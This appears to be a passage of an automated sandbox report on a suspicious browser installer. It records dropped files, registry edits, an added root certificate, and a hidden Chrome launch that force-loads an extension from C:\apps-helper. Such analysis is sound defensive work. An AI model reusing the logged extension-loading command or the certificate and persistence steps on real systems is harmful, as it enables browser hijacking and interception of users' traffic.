                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \Sre.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89+&| source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: setup.exe
                      Source: Binary string: System.Management.Automation.pdblb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: setup.exe, MSICC66.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdblat* source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb[ source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd50a source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E313000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb) source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb'iM source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbtionmw source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wininet.pdbUGP source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: setup.exe, lzmaextractor.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.exe, MSI3193.tmp.0.dr, MSICBB9.tmp.1.dr, MSICA7D.tmp.1.dr, MSI331F.tmp.0.dr, MSI35E5.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: shi3105.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCF120 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,FreeLibrary,0_2_00CCF120
                      Source: shi3105.tmp.0.drStatic PE information: section name: .wpp_sf
                      Source: shi3105.tmp.0.drStatic PE information: section name: .didat
                      Source: MSI4739.tmp.1.drStatic PE information: section name: _RDATA
                      Source: MSIFB77.tmp.1.drStatic PE information: section name: _RDATA
                      Source: shiC6A3.tmp.3.drStatic PE information: section name: .wpp_sf
                      Source: shiC6A3.tmp.3.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BBB10B push esi; ret 0_2_00BBB10D
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CAB2C0 push ecx; mov dword ptr [esp], 3F800000h0_2_00CAB3F6
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BBD310 push ecx; mov dword ptr [esp], ecx0_2_00BBD311
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BCC63B push ds; ret 0_2_00BCC63F
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D8086C push ecx; ret 0_2_00D8087F
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BBB10B push esi; ret 3_2_00BBB10D
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00CAB2C0 push ecx; mov dword ptr [esp], 3F800000h3_2_00CAB3F6
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BBD310 push ecx; mov dword ptr [esp], ecx3_2_00BBD311
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BCC63B push ds; ret 3_2_00BCC63F
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D8086C push ecx; ret 3_2_00D8087F
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00167FC0 push ecx; ret 8_2_00167FD3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B4019BC pushad ; ret 14_2_00007FFD9B4019C9

                      Persistence and Installation Behavior

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIFB77.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI4739.tmpJump to behavior
                      Uses cmd line tools excessively to alter registry or file data
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\viewer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI331F.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shi3105.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA7D.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC26.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBB9.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI32EF.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\tempFiles.dllJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shiC6A3.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4739.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3193.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID11C.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID04F.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3290.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dllJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3517.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB79.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3340.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICAEB.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3230.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI35A6.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC933.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3566.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC9EF.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI32CF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11D0.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI35E5.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3250.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3360.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB77.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI34E7.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC66.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB79.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICAEB.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC933.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA7D.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC9EF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC26.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11D0.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBB9.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4739.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB77.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID11C.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC66.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID04F.tmpJump to dropped file
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
